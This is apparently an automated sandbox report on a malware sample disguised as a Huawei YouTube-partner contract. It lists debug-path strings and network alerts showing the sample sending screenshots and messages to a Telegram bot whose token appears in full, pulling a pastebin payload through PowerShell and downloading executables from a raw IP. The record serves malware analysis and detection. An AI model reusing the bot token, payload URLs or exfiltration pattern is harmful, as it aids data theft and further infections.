Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249194705.000002B7E9380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248294715.000002B7E8F41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251506804.000002B7EA1F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251529668.000002B7EA200000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.NameResolution.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249010025.000002B7E9301000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249032962.000002B7E9310000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.pdbhP source: powershell.exe, 00000004.00000002.2198121281.00000224016FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.pdb source: powershell.exe, 00000004.00000002.2198121281.00000224016FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Net.Quic.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251604593.000002B7EA231000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251630855.000002B7EA250000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248367252.000002B7E8F70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248436550.000002B7E8FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246009062.00000277513F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246783735.000002B7E5F50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245924097.00000277513D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245901626.00000277513C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/Release/net8.0-windows/Microsoft.Win32.SystemEvents.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250920794.000002B7E9E81000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251066988.000002B7E9F90000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251180696.000002B7E9FD1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251365686.000002B7EA1A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251136685.000002B7E9FB0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251111684.000002B7E9FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250803085.000002B7E9E20000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250777948.000002B7E9E11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Drawing.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250876793.000002B7E9E70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250853000.000002B7E9E51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248611872.000002B7E90A0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248658900.000002B7E90C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245966712.00000277513E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246764040.000002B7E5F40000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA330000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3252368079.000002B7EA9E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245701128.0000027751321000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245657663.00000277512F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245605245.00000277512E0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245583929.00000277512D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248471233.000002B7E8FD0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248337268.000002B7E8F51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Windows.Forms.Primitives/Release/net8.0/System.Windows.Forms.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253245076.000002B7EB261000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253056950.000002B7EB090000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249143432.000002B7E9341000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249169651.000002B7E9360000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246850829.000002B7E5F90000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246824918.000002B7E5F71000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141674897.00007FF77A3F8000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244830292.000002774F971000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249770533.000002B7E9660000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248367252.000002B7E8F70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248436550.000002B7E8FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256Y$ source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.NonGeneric.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251410435.000002B7EA1B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251433635.000002B7EA1C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245701128.0000027751321000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245657663.00000277512F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248708035.000002B7E90E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248730109.000002B7E90F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Memory.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251506804.000002B7EA1F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251529668.000002B7EA200000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248496144.000002B7E8FF0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244705711.000002774F921000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249747447.000002B7E9640000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249726194.000002B7E9631000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249101985.000002B7E9330000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249078164.000002B7E9321000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.Windows.Core/Release/net8.0/System.Private.Windows.Core.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251295916.000002B7EA0C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251204268.000002B7E9FE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256}yx source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251180696.000002B7E9FD1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251365686.000002B7EA1A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Cryptography.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248833493.000002B7E91C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248750883.000002B7E9100000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245924097.00000277513D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245901626.00000277513C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/Release/net8.0/System.Private.DataContractSerialization.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249567499.000002B7E95B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249594148.000002B7E95C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256b' source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248367252.000002B7E8F70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248436550.000002B7E8FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245605245.00000277512E0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245583929.00000277512D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249620096.000002B7E95D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249669770.000002B7E9601000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Windows.Forms/Release/net8.0/System.Windows.Forms.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA330000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3252368079.000002B7EA9E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA256M source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249101985.000002B7E9330000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249078164.000002B7E9321000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Console.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246850829.000002B7E5F90000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246824918.000002B7E5F71000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248897242.000002B7E9280000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248955580.000002B7E92C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245331226.0000027751290000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244925040.000002774F991000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251180696.000002B7E9FD1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251365686.000002B7EA1A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.RegularExpressions\Release\net8.0\System.Text.RegularExpressions.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250422129.000002B7E9C80000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250523289.000002B7E9CE1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Drawing.Primitives\Release\net8.0-windows\System.Drawing.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250876793.000002B7E9E70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250853000.000002B7E9E51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248225564.000002B7E8F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248179022.000002B7E8EF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256iEc source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248708035.000002B7E90E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248730109.000002B7E90F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmp

Networking

Source: Network traffic | Suricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.6:49792 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:50002 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:50001 -> 149.154.167.220:443
Source: unknown | DNS query: name: pastebin.com
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: POST /bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendPhoto?chat_id=-4642404996 HTTP/1.1 Host: api.telegram.org Content-Type: multipart/form-data; boundary="e4a0611f-b7c4-4266-9d16-9a0547683bdd" Content-Length: 694321
Source: global traffic | HTTP traffic detected: POST /bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendMessage HTTP/1.1 Host: api.telegram.org Content-Type: application/x-www-form-urlencoded Content-Length: 253
Source: global traffic | HTTP traffic detected: POST /bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendMessage HTTP/1.1 Host: api.telegram.org Content-Type: application/x-www-form-urlencoded Content-Length: 252
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org
Source: global traffic | HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1 Host: ip-api.com
Source: global traffic | HTTP traffic detected: GET /Team/BILLI.exe HTTP/1.1 Host: 89.23.97.214
Source: global traffic | HTTP traffic detected: GET /Team/32cv.exe HTTP/1.1 Host: 89.23.97.214
Source: global traffic | HTTP traffic detected: GET /Team/BILLI.exe HTTP/1.1 Host: 89.23.97.214
Source: global traffic | HTTP traffic detected: GET /Team/32cv.exe HTTP/1.1 Host: 89.23.97.214
Source: global traffic | HTTP traffic detected: GET /Team/32cv.exe HTTP/1.1 Host: 89.23.97.214
Source: global traffic | HTTP traffic detected: GET /Team/BILLI.exe HTTP/1.1 Host: 89.23.97.214
Source: global traffic | HTTP traffic detected: GET /Team/32cv.exe HTTP/1.1 Host: 89.23.97.214
Source: global traffic | HTTP traffic detected: GET /Team/BILLI.exe HTTP/1.1 Host: 89.23.97.214
Source: Joe Sandbox View | IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View | IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: ip-api.com
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49778 -> 104.26.12.205:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49785 -> 208.95.112.1:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49825 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49824 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49960 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49994 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49995 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49998 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49999 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49961 -> 89.23.97.214:80
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49706 -> 172.67.19.24:443
Source: global traffic | HTTP traffic detected: GET /raw/WHKzW2nr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pastebin.com Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
